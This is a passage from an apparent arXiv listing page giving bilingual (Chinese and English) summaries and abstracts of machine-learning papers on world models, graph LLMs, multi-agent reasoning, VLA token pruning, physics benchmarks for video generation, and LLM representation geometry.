扩展动作可控世界模型受限于动作标签的稀缺性。虽然潜在动作学习有望从无标签视频中提取控制接口,但学习到的潜在表示往往难以跨上下文迁移:它们纠缠了场景特定线索,缺乏共享坐标系。这是因为标准目标仅在每个片段内操作,没有提供跨上下文对齐动作语义的机制。我们的关键洞察是,尽管动作未被观测到,但其语义效果是可观测的,可以作为共享参考。我们引入SeqΔ-REPA,一种序列级控制效果对齐目标,将集成潜在动作锚定到来自冻结自监督视频编码器的时序特征差异。基于此,我们提出Olaf-World,一个从大规模被动视频中预训练动作条件视频世界模型的流程。大量实验表明,我们的方法学习了更结构化的潜在动作空间,从而在零样本动作迁移和适应新控制接口的数据效率上优于最先进的基线方法。

英文摘要

Scaling action-controllable world models is limited by the scarcity of action labels. While latent action learning promises to extract control interfaces from unlabeled video, learned latents often fail to transfer across contexts: they entangle scene-specific cues and lack a shared coordinate system. This occurs because standard objectives operate only within each clip, providing no mechanism to align action semantics across contexts. Our key insight is that although actions are unobserved, their semantic effects are observable and can serve as a shared reference. We introduce SeqΔ-REPA, a sequence-level control-effect alignment objective that anchors integrated latent action to temporal feature differences from a frozen, self-supervised video encoder. Building on this, we present Olaf-World, a pipeline that pretrains action-conditioned video world models from large-scale passive video. Extensive experiments demonstrate that our method learns a more structured latent action space, leading to stronger zero-shot action transfer and more data-efficient adaptation to new control interfaces than state-of-the-art baselines.

2602.09038 2026-05-27 cs.DB cs.AI 版本更新

Scaling GraphLLM with Bilevel-Optimized Sparse Querying

基于双层优化稀疏查询的GraphLLM扩展

Yangzhe Peng, Haiquan Qiu, Quanming Yao, Kun He

发表机构 * Huazhong University of Science and Technology(华中科技大学) Tsinghua University(清华大学)

AI总结 提出BOSQ框架,通过自适应稀疏查询策略选择性调用LLM,在降低计算成本的同时保持或提升图节点任务性能。

详情
AI中文摘要

LLMs最近通过提供解释特征,在文本属性图(TAGs)上增强节点级任务方面显示出强大潜力。然而,重复LLM查询的高计算和货币成本严重限制了其实际应用。举例来说,使用代表性方法(如TAPE)为中等规模基准(如Photo,48k节点)上的所有节点朴素生成解释将消耗数天的处理时间。在本文中,我们提出双层优化稀疏查询(BOSQ),一个通用框架,选择性利用LLM导出的解释特征来提升TAGs上节点级任务的性能。我们设计了一种自适应稀疏查询策略,选择性决定何时调用LLM,避免冗余或低增益查询,显著降低计算开销。在涉及两种节点级任务的六个真实世界TAG数据集上的大量实验表明,BOSQ比现有GraphLLM方法运行速度显著更快,同时持续提供相当或更优的性能。

英文摘要

LLMs have recently shown strong potential in enhancing node-level tasks on text-attributed graphs (TAGs) by providing explanation features. However, their practical use is severely limited by the high computational and monetary cost of repeated LLM queries. To illustrate, naively generating explanations for all nodes on a medium-sized benchmark like Photo (48k nodes) using a representative method (e.g., TAPE) would consume days of processing time. In this paper, we propose Bilevel-Optimized Sparse Querying (BOSQ), a general framework that selectively leverages LLM-derived explanation features to enhance performance on node-level tasks on TAGs. We design an adaptive sparse querying strategy that selectively decides when to invoke LLMs, avoiding redundant or low-gain queries and significantly reducing computation overhead. Extensive experiments on six real-world TAG datasets involving two types of node-level tasks demonstrate that BOSQ runs substantially faster than existing GraphLLM methods while consistently delivering on-par or superior performance.

2602.08586 2026-05-27 cs.AI 版本更新

DIANOIA: Diagnostic Decomposition and Joint Optimization for Multi-Agent Reasoning

DIANOIA: 多智能体推理的诊断性分解与联合优化

Yiming Yang, Zhuoyuan Li, Fanxiang Zeng, Hao Fu, Yue Liu

发表机构 * Alibaba Group(阿里巴巴集团)

AI总结 提出DIANOIA框架,通过覆盖度、保真度和综合度三个可测量通道分解多智能体推理增益,并基于此设计诊断协议和对应系统,在多个基准上以更少token实现更优性能。

详情
AI中文摘要

多智能体LLM系统持续优于单智能体基线,但从业者仍无法预测哪种设计适用于新任务或诊断失败原因。我们认为这一差距主要源于该领域缺乏具有可测量原语和可测试预测的诊断框架。我们引入DIANOIA,将多智能体推理增益分解为覆盖度、保真度和综合度三个通道,每个通道均可经验测量。基于此分解,我们推导出一个诊断协议,可识别任何给定任务的瓶颈通道。我们将该协议实例化为一个多智能体系统,其三个组件与通道对应:角色多样化的提议者(覆盖度)、基于执行验证的验证者(保真度)和迭代综合者。在GSM8K、AIME-2025、MBPP和BFCL-SP上,我们的方法在匹配token预算下优于强多智能体基线,在MBPP上以约$5\times$的token节省主导帕累托前沿,在匹配成本下达到$+4.6$pp。在每个基准上,协议都能正确选择瓶颈通道;我们围绕它构建的系统在多个模型上领先。我们发布代码、适配器、诊断指标和Claude Code技能,网址为https://anonymous.4open.science/r/DIANOIA4MAS。DIANOIA将多智能体设计重新定义为通道感知的资源分配:诊断你的任务的瓶颈通道,然后相应投入token。

英文摘要

Multi-agent LLM systems consistently outperform single-agent baselines, yet practitioners still cannot predict which design works for a new task or diagnose why one fails. We argue this gap persists largely because the field lacks a diagnostic framework with measurable primitives and testable predictions. We introduce DIANOIA, a three-channel decomposition of multi-agent reasoning gain into coverage, fidelity, and synthesis, each of which is empirically measurable. From this decomposition, we derive a diagnostic protocol that identifies the bottleneck channels for any given task. We instantiate the protocol as a multi-agent system whose three components mirror the channels: role-diverse proposers for coverage, execution-grounded verification for fidelity, and iterative synthesis. On GSM8K, AIME-2025, MBPP, and BFCL-SP, our method outperforms strong multi-agent baselines under matched token budgets, dominating the Pareto frontier on MBPP at $\sim 5\times$ token savings and reaching $+4.6$ pp at matched cost. On every benchmark, the protocol picks the right bottleneck channels; the system we built around it leads across models. We release code, adapters, diagnostic metrics, and a Claude Code skill at https://anonymous.4open.science/r/DIANOIA4MAS. DIANOIA reframes multi-agent design as channel-aware resource allocation: diagnose which channel is the bottleneck for your task, then invest tokens accordingly.

2511.16449 2026-05-27 cs.CV cs.AI 版本更新

Bridging the Semantic-Action Gap in Visual Token Pruning for Efficient VLA Inference

弥合视觉令牌剪枝中的语义-动作鸿沟以实现高效VLA推理

Ziyan Liu, Yeqiu Chen, Hongyi Cai, Tao Lin, Shuo Yang, Zheng Liu, Bo Zhao

发表机构 * School of AI, Shanghai Jiao Tong University(上海交通大学人工智能学院) University of Science and Technology of China(中国科学技术大学) Harbin Institute of Technology (Shenzhen)(哈尔滨工业大学(深圳)) BAAI(北京人工智能研究院)

AI总结 提出VLA-Pruner方法,通过结合语义预填充和时序平滑的动作相关性估计视觉令牌重要性,并采用Combine-then-Filter策略,在保持操作质量的同时实现高达1.99倍加速。

详情
AI中文摘要

视觉-语言-动作(VLA)模型通过整合视觉感知、语言理解和动作执行,在具身人工智能中展现出巨大潜力。在实时部署中,这些模型必须处理连续的视觉流,产生大量计算开销。视觉令牌剪枝——一种通过保留显著令牌同时丢弃冗余令牌来加速视觉-语言模型(VLM)的主流技术——为这一挑战提供了自然的候选解决方案。然而,直接将面向VLM的剪枝方法应用于VLA推理会导致操作性能严重下降。我们的分析将这种下降归因于一个关键不匹配:VLA推理在视觉-语言预填充阶段和动作解码阶段表现出不同的注意力模式,因此仅基于上下文预填充语义显著性的剪枝偏向语义线索,可能移除动作关键的视觉令牌。受此观察启发,我们提出VLA-Pruner,一种有效的即插即用令牌剪枝方法,基于VLA推理的视觉需求,并进一步利用机器人操作的时间连续性。具体来说,VLA-Pruner从语义预填充和时序平滑的动作相关性两方面估计视觉令牌重要性,然后采用Combine-then-Filter策略,在计算预算下保留紧凑、非冗余的令牌。实验表明,VLA-Pruner在多种VLA架构上优于最先进方法,在相当的操作质量下实现高达1.99倍加速。

英文摘要

Vision-Language-Action (VLA) models have shown great potential for embodied AI by integrating visual perception, language understanding, and action execution. In real-time deployment, these models must process continuous visual streams, incurring substantial computational overhead. Visual token pruning -- a mainstream technique for accelerating Vision-Language Models (VLMs) by retaining salient tokens while discarding redundant ones -- offers a natural candidate solution to this challenge. However, directly applying VLM-oriented pruning methods to VLA inference can cause severe degradation in manipulation performance. Our analysis attributes this degradation to a key mismatch: VLA inference exhibits distinct attention patterns between the vision-language prefill stage and the action-decode stage, so pruning based only on context-prefill semantic salience is biased toward semantic cues and may remove action-critical visual tokens. Motivated by this observation, we propose VLA-Pruner, an effective plug-and-play token pruning method grounded in the visual requirements of VLA inference, further exploiting the temporal continuity of robot manipulation. Specifically, VLA-Pruner estimates visual-token importance from both semantic prefilling and temporally smoothed action relevance, and then applies a Combine-then-Filter strategy to retain compact, non-redundant tokens under the compute budget. Experiments show that VLA-Pruner outperforms state-of-the-art approaches across multiple VLA architectures, achieving up to 1.99x speedup with comparable manipulation quality.

2511.06625 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Explainable Cross-Disease Reasoning for Cardiovascular Risk Assessment from Low-Dose Computed Tomography

可解释的跨疾病推理:基于低剂量计算机断层扫描的心血管风险评估

Yifei Zhang, Jiashuo Zhang, Mojtaba Safari, Xiaofeng Yang, Liang Zhao

发表机构 * Department of Computer Science, Emory University(埃默里大学计算机科学系) Department of Computer Science, Johns Hopkins University(约翰霍普金斯大学计算机科学系) Department of Radiation Oncology(放射肿瘤学部) Winship Cancer Institute, Emory University(埃默里大学Winship癌症研究所)

AI总结 提出一种可解释的跨疾病推理框架,通过提取肺部发现、基于医学知识进行跨器官机制推理,并结合心脏子体积特征,从低剂量胸部CT中实现心血管风险评估,在NLST队列中AUC达0.919。

详情
AI中文摘要

低剂量胸部计算机断层扫描(LDCT)在一次扫描中捕获肺部和心脏结构,使得能够联合评估肺部和心血管健康。现有方法通常独立建模这些领域,并未明确表示它们的生理交互。我们提出了一种可解释的跨疾病推理框架,用于从LDCT进行心血管风险评估。该框架遵循受限的临床信息路径:它提取肺部发现,将跨器官机制基于医学知识进行推理,并生成带有自然语言理由的心血管预测。它结合了四个组件:一个冻结的肺风险先验、一个肺部感知模块、一个代理推理模块和一个心脏子体积特征提取器。它们的输出被融合,以将局部心脏证据与机制层面的肺部上下文整合。在国家肺筛查试验队列中,该框架在CVD筛查中达到0.919的AUC,在CVD死亡率预测中高达0.838,优于心脏特异性、单疾病和基础模型基线。目标对照表明,这些增益不能仅由额外的胸部视觉特征、固定规则传播或单一推理后端解释。因此,所提出的框架提供了一种可审计的方法,用于从LDCT进行跨疾病心血管风险评估。

英文摘要

Low-dose chest computed tomography (LDCT) captures pulmonary and cardiac structures in a single scan, enabling joint assessment of lung and cardiovascular health. Existing approaches typically model these domains independently and do not explicitly represent their physiological interactions. We propose an Explainable Cross-Disease Reasoning Framework for cardiovascular risk assessment from LDCT. The framework follows a constrained clinical-information pathway: it extracts pulmonary findings, grounds cross-organ mechanisms in medical knowledge, and produces a cardiovascular prediction with a natural-language rationale. It combines four components: a frozen lung-risk prior, a pulmonary perception module, an agentic reasoning module, and a cardiac subvolume feature extractor. Their outputs are fused to integrate localized cardiac evidence with mechanism-level pulmonary context. On the National Lung Screening Trial cohort, the framework achieves an AUC of 0.919 for CVD screening and up to 0.838 for CVD mortality prediction, outperforming cardiac-specific, single-disease, and foundation-model baselines. Targeted controls indicate that the gains are not explained by additional thoracic visual features alone, fixed rule propagation, or a single reasoning backend. The proposed framework thus provides an auditable approach to cross-disease cardiovascular risk assessment from LDCT.

2507.13428 2026-05-27 cs.CV cs.AI 版本更新

"PhyWorldBench": A Comprehensive Evaluation of Physical Realism in Text-to-Video Models

PhyWorldBench:文本到视频模型中物理真实性的全面评估

Jing Gu, Xian Liu, Yu Zeng, Ashwin Nagarajan, Fangrui Zhu, Daniel Hong, Yue Fan, Qianqi Yan, Kaiwen Zhou, Ming-Yu Liu, Xin Eric Wang

发表机构 * University of California, Santa Cruz(加州大学圣克鲁兹分校) NVIDIA Research(NVIDIA研究院) Northeastern University(美国东北大学) University of California, Santa Barbara(加州大学圣巴巴拉分校)

AI总结 提出PhyWorldBench基准,通过1050个提示评估12个视频生成模型在物理规律遵循上的表现,并引入反物理类别,利用多模态大语言模型进行零样本评估。

Comments 35 pages, 21 figures

详情
Journal ref ICLR 2026 oral
AI中文摘要

视频生成模型在创建高质量、逼真内容方面取得了显著进展。然而,它们准确模拟物理现象的能力仍然是一个关键且未解决的挑战。本文提出了PhyWorldBench,一个全面的基准测试,旨在根据视频生成模型对物理定律的遵循程度进行评估。该基准涵盖了多个层次的物理现象,从基本物理原理如物体运动和能量守恒,到更复杂的场景如刚体相互作用以及人或动物的运动。此外,我们引入了一个新颖的反物理类别,其中提示故意违反现实世界的物理规律,从而评估模型在保持逻辑一致性的同时能否遵循此类指令。除了大规模人工评估外,我们还设计了一种简单而有效的方法,利用当前的多模态大语言模型以零样本方式评估物理真实性。我们评估了12个最先进的文本到视频生成模型,包括五个开源模型和五个专有模型,并进行了详细的比较和分析。通过对跨越基础、复合和反物理场景的1050个精心策划的提示进行系统测试,我们识别出这些模型在遵循现实世界物理规律方面面临的关键挑战。我们进一步研究了它们在不同物理现象和提示类型下的表现,并得出了针对性的建议,以构建增强物理原理保真度的提示。

英文摘要

Video generation models have achieved remarkable progress in creating high-quality, photorealistic content. However, their ability to accurately simulate physical phenomena remains a critical and unresolved challenge. This paper presents PhyWorldBench, a comprehensive benchmark designed to evaluate video generation models based on their adherence to the laws of physics. The benchmark covers multiple levels of physical phenomena, ranging from fundamental principles such as object motion and energy conservation to more complex scenarios involving rigid body interactions and human or animal motion. Additionally, we introduce a novel Anti-Physics category, where prompts intentionally violate real-world physics, enabling the assessment of whether models can follow such instructions while maintaining logical consistency. Besides large-scale human evaluation, we also design a simple yet effective method that utilizes current multimodal large language models to evaluate physics realism in a zero-shot fashion. We evaluate 12 state-of-the-art text-to-video generation models, including five open-source and five proprietary models, with detailed comparison and analysis. Through systematic testing across 1050 curated prompts spanning fundamental, composite, and anti-physics scenarios, we identify pivotal challenges these models face in adhering to real-world physics. We further examine their performance under diverse physical phenomena and prompt types, and derive targeted recommendations for crafting prompts that enhance fidelity to physical principles.

2601.21008 2026-05-27 cs.LG cs.AI math.OC 版本更新

ORLoopBench: Solver-in-the-Loop Benchmarks for Self-Correction and Behavioral Rationality in Operations Research

ORLoopBench:运筹学中自我修正与行为理性的求解器在环基准测试

Ruicheng Ao, David Simchi-Levi, Xinshang Wang

AI总结 提出ORLoopBench基准套件,通过将不可行模型修复形式化为求解器在环马尔可夫决策过程,利用不可约不可行子系统(IIS)反馈,结合验证强化学习训练(RLVR),使8B模型在LP修复上超越前沿API(95.3% vs 92.4% RR@5),并揭示全模型代码再生中的语义漂移问题。

Comments 58 pages, accepted by ICML 2026

详情
AI中文摘要

运筹学从业者通过迭代过程调试不可行模型:检查不可约不可行子系统(IIS),识别约束冲突,并修复公式直至恢复可行性。现有的LLM基准大多将OR视为从问题描述到求解器代码的一次性翻译,忽略了这一诊断循环。我们将不可行模型修复形式化为一个求解器在环马尔可夫决策过程,其中每个动作触发求解器重新执行和IIS重新计算,产生确定性的、可验证的反馈。我们引入ORLoopBench,一个包含两个组件的基准套件:OR-Debug-Bench发布5,362个LP/MILP修复实例,而OR-Bias-Bench评估库存设置中的闭式运营决策理性。求解器验证的RLVR训练使8B模型在LP修复上超越前沿API(95.3% vs 92.4% RR@5),改善诊断行为,并迁移到MILP修复。同样的评估暴露了全模型代码再生中的语义漂移:可行的再生MILP可能解决错误的问题。使用求解器预言机的过程级评估能够为可靠的OR自我修正进行针对性训练。

英文摘要

Operations Research practitioners debug infeasible models through an iterative process: inspecting Irreducible Infeasible Subsystems (IIS), identifying constraint conflicts, and repairing formulations until feasibility is restored. Existing LLM benchmarks mostly treat OR as one-shot translation from problem descriptions to solver code, omitting this diagnostic loop. We formalize infeasible-model repair as a solver-in-the-loop Markov Decision Process in which each action triggers solver re-execution and IIS recomputation, yielding deterministic, verifiable feedback. We introduce ORLoopBench, a benchmark suite with two components: OR-Debug-Bench releases 5,362 LP/MILP repair instances, while OR-Bias-Bench evaluates closed-form operational decision rationality across inventory settings. Solver-verified RLVR training enables an 8B model to surpass frontier APIs on LP repair (95.3% vs 92.4% RR@5), improves diagnostic behavior, and transfers to MILP repair. The same evaluation exposes semantic drift in whole-model code regeneration: feasible regenerated MILPs can solve the wrong problem. Process-level evaluation with solver oracles enables targeted training for reliable OR self-correction.
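
The notion of an Irreducible Infeasible Subsystem mentioned in the abstract can be illustrated without a solver. The sketch below is not ORLoopBench code. It applies the classical deletion filter to a toy model in which every constraint is an interval bound on a single variable x, so feasibility reduces to checking that the intervals intersect. The constraint names and the helpers `is_feasible` and `deletion_filter_iis` are hypothetical, chosen only for illustration.

```python
def is_feasible(constraints):
    """Intervals lo <= x <= hi share a point iff max(lo) <= min(hi)."""
    if not constraints:
        return True
    lows = [lo for lo, _ in constraints.values()]
    highs = [hi for _, hi in constraints.values()]
    return max(lows) <= min(highs)


def deletion_filter_iis(constraints):
    """Return the names of one irreducible infeasible subset."""
    if is_feasible(constraints):
        raise ValueError("model is feasible; no IIS exists")
    kept = dict(constraints)
    for name in list(constraints):
        trial = {n: b for n, b in kept.items() if n != name}
        if not is_feasible(trial):
            # Still infeasible without this constraint, so it is not
            # needed to explain the conflict: drop it for good.
            kept = trial
    return list(kept)


# Toy model (assumed data): "b" conflicts with each of the others.
model = {"a": (0, 5), "b": (6, 10), "c": (1, 4), "d": (2, 3)}
iis = deletion_filter_iis(model)
print(iis)
```

Removing any single member of the returned subset restores feasibility, which is the property a repair step can exploit: it only needs to relax one constraint from the IIS. Which IIS is found depends on the order in which constraints are tried.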

2501.06708 2026-05-27 cs.LG cs.AI 版本更新

Evaluating Sample Utility for Efficient Data Selection by Mimicking Model Weights

通过模仿模型权重评估样本效用以实现高效数据选择

Tzu-Heng Huang, Manjot Bilkhu, John Cooper, Frederic Sala, Javier Movellan

发表机构 * Apple(苹果公司)

AI总结 提出基于梯度和几何的Mimic Score指标,通过Grad-Mimic框架在线重加权样本加速训练、离线构建数据过滤器,在六个图像数据集上提升数据效率和CLIP模型性能。

Comments This work appears in the Proceedings of the 43rd International Conference on Machine Learning (ICML 2026) and was selected as an Oral paper at the ICML 2025 DataWorld Workshop

详情
AI中文摘要

大规模网络爬取数据集包含噪声、偏差和不相关信息,因此需要数据选择技术。现有方法依赖于手工启发式、下游数据集或需要昂贵的基于影响力的计算——所有这些都限制了可扩展性并引入了不必要的数据依赖性。为了解决这个问题,我们引入了Mimic Score,一种简单且基于几何的数据质量指标,通过测量样本梯度与预训练参考模型诱导的目标方向之间的对齐来评估效用。这利用了现成的模型权重,避免了验证数据集的需求,并且计算开销最小。基于该指标,我们提出了Grad-Mimic,一个两阶段框架,在线重新加权样本以加速训练,并离线聚合样本效用以构建有效的数据过滤器。实验表明,使用模仿分数指导训练提高了数据效率,加速了收敛,在六个图像数据集上取得了一致的性能提升,并以减少20.7%的训练步骤增强了CLIP模型。此外,基于模仿分数的过滤器增强了现有过滤技术,使得用更少470万个样本训练的CLIP模型得到改进。

英文摘要

Large-scale web-crawled datasets contain noise, bias, and irrelevant information, necessitating data selection techniques. Existing methods rely on hand-crafted heuristics or downstream datasets, or require expensive influence-based computations, all of which limit scalability and introduce unwanted data dependencies. To address this, we introduce the Mimic Score, a simple, geometry-based data-quality metric that evaluates utility by measuring alignment between a sample's gradients and a target direction induced by a pre-trained reference model. This leverages readily available model weights, avoids the need for validation datasets, and incurs minimal computational overhead. Building on this metric, we propose Grad-Mimic, a two-stage framework that re-weights samples online to accelerate training and aggregates sample utilities offline to construct effective data filters. Empirically, we show that using mimic scores to guide training improves data efficiency, accelerates convergence, yields consistent performance gains across six image datasets, and enhances CLIP models with 20.7% fewer training steps. Additionally, mimic score-based filters augment existing filtering techniques, enabling improved CLIP models trained with 4.7 million fewer samples.
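
As a rough illustration of the alignment idea described above, the following sketch scores a sample by projecting its descent step (the negative gradient) onto the unit vector pointing from the current weights to the reference weights. The abstract does not give the exact formula, so this projection, the toy linear model, and the names `per_sample_gradient` and `mimic_score` are assumptions made for illustration, not the authors' implementation.

```python
import math


def per_sample_gradient(w, x, y):
    """Gradient of 0.5 * (w.x - y)^2 with respect to w."""
    residual = sum(wi * xi for wi, xi in zip(w, x)) - y
    return [residual * xi for xi in x]


def mimic_score(w, w_ref, grad):
    """Projection of the descent step (-grad) onto the unit vector w -> w_ref."""
    direction = [r - c for r, c in zip(w_ref, w)]
    norm = math.sqrt(sum(d * d for d in direction))
    if norm == 0.0:
        return 0.0  # already at the reference weights: no direction to mimic
    return sum(-g * d for g, d in zip(grad, direction)) / norm


w = [0.0, 0.0]      # current weights (assumed)
w_ref = [1.0, 0.0]  # stand-in for pre-trained reference weights (assumed)

# A sample whose label agrees with the reference model, and a mislabeled one.
clean = mimic_score(w, w_ref, per_sample_gradient(w, [1.0, 0.0], 1.0))
noisy = mimic_score(w, w_ref, per_sample_gradient(w, [1.0, 0.0], -1.0))
print(clean, noisy)
```

Under these assumptions the clean sample gets a positive score because its update moves toward the reference weights, while the mislabeled sample gets a negative one. Scores of this kind could then be used to down-weight or filter samples.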

2602.04931 2026-05-27 cs.LG cs.AI 版本更新

Emergent Causal-Geometric Dynamics Across Depth in Large Language Models

大型语言模型中跨深度的涌现因果几何动力学

Shahar Haim, Daniel C McNamee

发表机构 * Champalimaud Centre for the Unknown(尚帕利莫未知研究中心)

AI总结 通过结合几何分析与因果干预,揭示了解码器-only大型语言模型中从上下文处理到预测形成的跨层转变,并发现后期层中角度结构参数化下一词分布相似性并实现选择性因果控制。

详情
AI中文摘要

对大型语言模型(LLM)表征的几何分析揭示了跨深度的结构化变化,但就token预测的形成而言,这类分析本质上仍只是相关性的。同时,因果干预揭示了依赖于深度的效能曲线,但缺乏对其表征动力学的统一解释。对LLM功能的完整解释需要说明表征结构如何跨深度演化以因果性地产生预测。我们通过将几何分析与机制性干预相结合,明确将跨深度动力学作为解释LLM功能的组织轴,综合了这些视角。在仅解码器LLM中,我们识别出从上下文处理到预测形成计算的急剧转变,伴随着跨层的表征几何的更渐进重组。这种综合揭示了一种后期层几何编码,其中角度结构参数化下一词分布相似性,并能够对预测进行选择性因果控制,而表征范数编码的信息与预测基本解耦。总之,我们的结果提供了因果和几何视角的综合,产生了关于语言模型中跨深度的控制相关几何动力学如何将上下文转化为预测的机制性解释。这一视角调和了先前令人困惑的发现,并表明逐层功能不能孤立地理解或有效干预,而只能在网络涌现的全局动力学结构中理解。

英文摘要

Geometric analyses of large language model (LLM) representations reveal structured variation across depth but remain fundamentally correlational with respect to token prediction formation. Meanwhile, causal interventions expose depth-dependent efficacy profiles without a unifying account of their representational dynamics. A complete account of LLM function requires explaining how representational structure evolves across depth to causally produce predictions. We synthesize these perspectives by combining geometric analysis with mechanistic interventions, explicitly centralizing depth-wise dynamics as the organizing axis for interpreting LLM function. In decoder-only LLMs, we identify a sharp transition from context-processing to prediction-forming computation, accompanied by a more gradual reorganization of representational geometry across layers. This synthesis reveals a late-layer geometric code in which angular structure parameterizes next-token distributional similarity and enables selective causal control over predictions, while representation norms encode information largely decoupled from prediction. Together, our results provide a synthesis of causal and geometric perspectives, yielding a mechanistic account of how control-relevant geometric dynamics across depth transform context into prediction in language models. This perspective reconciles previously puzzling findings and implies that layer-wise function cannot be understood or effectively intervened upon in isolation, but only within the emergent global dynamical structure of the network.

2602.03545 2026-05-27 cs.AI 版本更新

Persona Generators: Generating Diverse Synthetic Personas for Arbitrary Contexts

人格生成器:为任意上下文生成多样化的合成人格

Davide Paglieri, Logan Cross, William A. Cunningham, Joel Z. Leibo, Alexander Sasha Vezhnevets

发表机构 * Google DeepMind(谷歌DeepMind)

AI总结 提出Persona Generators,通过迭代进化优化生成覆盖广泛意见和偏好的多样化合成人格,在六个多样性指标上显著优于现有基线。

详情
AI中文摘要

评估与人类交互的AI系统需要理解它们在不同用户群体中的行为,但收集代表性人类数据通常成本高昂或不可行,特别是对于新技术或假设的未来场景。最近在生成式基于智能体建模方面的工作表明,大型语言模型可以高保真地模拟类似人类的合成人格,准确再现特定个体的信念和行为。然而,大多数方法需要关于目标群体的详细数据,并且通常优先考虑密度匹配(复制最可能的内容)而非支持覆盖(覆盖可能的内容),导致长尾行为未被充分探索。我们引入了Persona Generators,即能够为任意上下文生成多样化合成群体的函数。我们应用基于AlphaEvolve的迭代改进循环,使用大型语言模型作为变异算子,在数百次迭代中优化我们的Persona Generator代码。优化过程产生了轻量级的Persona Generators,能够自动将小规模描述扩展为多样化的合成人格群体,这些群体在相关多样性轴上最大化意见和偏好的覆盖。我们证明,进化后的生成器在保留上下文上的六个多样性指标上显著优于现有基线,产生了覆盖标准LLM输出中难以实现的罕见特征组合的群体。

英文摘要

Evaluating AI systems that interact with humans requires understanding their behavior across diverse user populations, but collecting representative human data is often expensive or infeasible, particularly for novel technologies or hypothetical future scenarios. Recent work in Generative Agent-Based Modeling has shown that large language models can simulate human-like synthetic personas with high fidelity, accurately reproducing the beliefs and behaviors of specific individuals. However, most approaches require detailed data about target populations and often prioritize density matching (replicating what is most probable) rather than support coverage (spanning what is possible), leaving long-tail behaviors underexplored. We introduce Persona Generators, functions that can produce diverse synthetic populations tailored to arbitrary contexts. We apply an iterative improvement loop based on AlphaEvolve, using large language models as mutation operators to refine our Persona Generator code over hundreds of iterations. The optimization process produces lightweight Persona Generators that can automatically expand small descriptions into populations of diverse synthetic personas that maximize coverage of opinions and preferences along relevant diversity axes. We demonstrate that evolved generators substantially outperform existing baselines across six diversity metrics on held-out contexts, producing populations that span rare trait combinations difficult to achieve in standard LLM outputs.

2602.03238 2026-05-27 cs.AI 版本更新

The Necessity of a Unified Framework for LLM-Based Agent Evaluation

基于LLM的智能体评估统一框架的必要性

Pengyu Zhu, Li Sun, Philip S. Yu, Sen Su

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学) University of Illinois Chicago(伊利诺伊大学芝加哥分校) Chongqing University of Posts and Telecommunications(重庆邮电大学)

AI总结 针对当前LLM智能体评估受系统提示、工具集和环境动态等混杂因素影响的问题,提出标准化统一评估框架以提升公平性和可复现性。

详情
AI中文摘要

随着大型语言模型(LLM)的出现,通用智能体取得了根本性进展。然而,评估这些智能体带来了独特的挑战,使其区别于静态的问答基准。我们观察到,当前的智能体基准受到系统提示、工具集配置和环境动态等外部因素的严重混淆。现有评估通常依赖于碎片化的、研究者特定的框架,其中推理和工具使用的提示工程差异很大,使得难以将性能提升归因于模型本身。此外,缺乏标准化的环境数据导致不可追踪的错误和不可重复的结果。这种标准化的缺失给该领域带来了显著的不公平性和不透明性。我们提出,一个统一的评估框架对于智能体评估的严谨进展至关重要。为此,我们提出了一项旨在标准化智能体评估的建议。

英文摘要

With the advent of Large Language Models (LLMs), general-purpose agents have seen fundamental advancements. However, evaluating these agents presents unique challenges that distinguish them from static QA benchmarks. We observe that current agent benchmarks are heavily confounded by extraneous factors, including system prompts, toolset configurations, and environmental dynamics. Existing evaluations often rely on fragmented, researcher-specific frameworks where the prompt engineering for reasoning and tool usage varies significantly, making it difficult to attribute performance gains to the model itself. Additionally, the lack of standardized environmental data leads to untraceable errors and non-reproducible results. This lack of standardization introduces substantial unfairness and opacity into the field. We propose that a unified evaluation framework is essential for the rigorous advancement of agent evaluation. To this end, we introduce a proposal aimed at standardizing agent evaluation.

2602.02518 2026-05-27 cs.LG cs.AI cs.CL 版本更新

GraphDancer: Training LLMs to Explore and Reason over Graphs via Two-Stage Curriculum Post-Training

GraphDancer: 通过两阶段课程后训练训练LLMs在图上的探索与推理

Yuyang Bai, Zhuofeng Li, Ping Nie, Jianwen Xie, Yu Zhang

发表机构 * Texas A&M University(德克萨斯农工大学) University of Waterloo(滑铁卢大学) Lambda(Lambda公司) University of Oregon(俄勒冈大学)

AI总结 提出GraphDancer两阶段后训练框架,通过图感知课程逐步增加任务难度,使LLMs学会在异构图上进行自然语言推理与函数调用交织的探索与推理,仅用3B骨干模型即在跨域基准上超越更强基线。

Comments 15 pages, Project website: https://yuyangbai.com/graphdancer/

详情
AI中文摘要

大型语言模型(LLMs)越来越依赖外部知识来提高事实性,然而许多真实世界的知识源被组织为异构图而非纯文本。在此类图上进行推理要求模型通过精确的函数调用遵循模式定义的关系,并在多轮交互中聚合证据。我们提出GraphDancer,一个两阶段后训练框架,通过将自然语言推理与图函数执行交织来教导LLMs在图上的推理。第一阶段教导模型在基于规则的奖励下如何与图交互,而第二阶段进一步教导其偏好更基于事实且高效的交互轨迹。GraphDancer的关键创新在于一个图感知课程,该课程根据信息寻求轨迹的结构复杂性组织两个阶段,在训练期间逐步增加任务难度。我们在一个多领域基准上评估GraphDancer,仅在一个领域上训练,并在未见过的领域和分布外问题类型上进行测试。尽管仅使用3B骨干模型,GraphDancer仍优于配备更大/更强骨干的基线,展示了图探索和推理技能的强大跨域泛化能力。我们的代码可在https://github.com/leopoldwhite/GraphDancer找到。

英文摘要

Large language models (LLMs) increasingly rely on external knowledge to improve factuality, yet many real-world knowledge sources are organized as heterogeneous graphs rather than plain text. Reasoning over such graphs requires models to follow schema-defined relations through precise function calls and to aggregate evidence across multiple rounds of interaction. We propose GraphDancer, a two-stage post-training framework that teaches LLMs to reason over graphs by interleaving natural-language reasoning with graph function execution. The first stage teaches the model how to interact with the graph under rule-based rewards, while the second stage further teaches it to prefer more grounded and efficient interaction trajectories. The key novelty of GraphDancer is a graph-aware curriculum that organizes both stages by the structural complexity of information-seeking trajectories, progressively increasing task difficulty during training. We evaluate GraphDancer on a multi-domain benchmark by training on one domain only and testing on unseen domains and out-of-distribution question types. Despite using only a 3B backbone, GraphDancer outperforms baselines equipped with larger/stronger backbones, demonstrating robust cross-domain generalization of graph exploration and reasoning skills. Our code can be found at https://github.com/leopoldwhite/GraphDancer.

2602.01518 2026-05-27 cs.AI 版本更新

Qrita: High-performance Top-k and Top-p using Pivot-based Truncation and Selection

Qrita:使用基于枢轴的截断和选择的高性能Top-k和Top-p

Jongseok Park, Sunga Kim, Alvin Cheung, Ion Stoica

发表机构 * University of California, Berkeley(加州大学伯克利分校)

